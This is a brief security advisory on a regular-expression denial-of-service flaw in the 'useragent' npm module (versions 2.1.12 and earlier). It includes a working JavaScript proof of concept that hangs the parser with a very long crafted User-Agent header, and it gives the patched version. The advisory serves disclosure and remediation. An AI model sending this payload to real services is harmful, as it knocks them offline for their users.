ReDoS via long UserAgent header

Module: useragent

Published: April 14th, 2017

Reported by: Mathias Madsen

CVE-NONE

CWE-400

Vulnerable: <=2.1.12
Patched: >=2.1.13

Overview

Affected versions of useragent are vulnerable to regular expression denial of service when an arbitrarily long User-Agent header is parsed.

Proof of Concept

var useragent = require('useragent');

var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));

Remediation

Update to version 2.1.13 or later.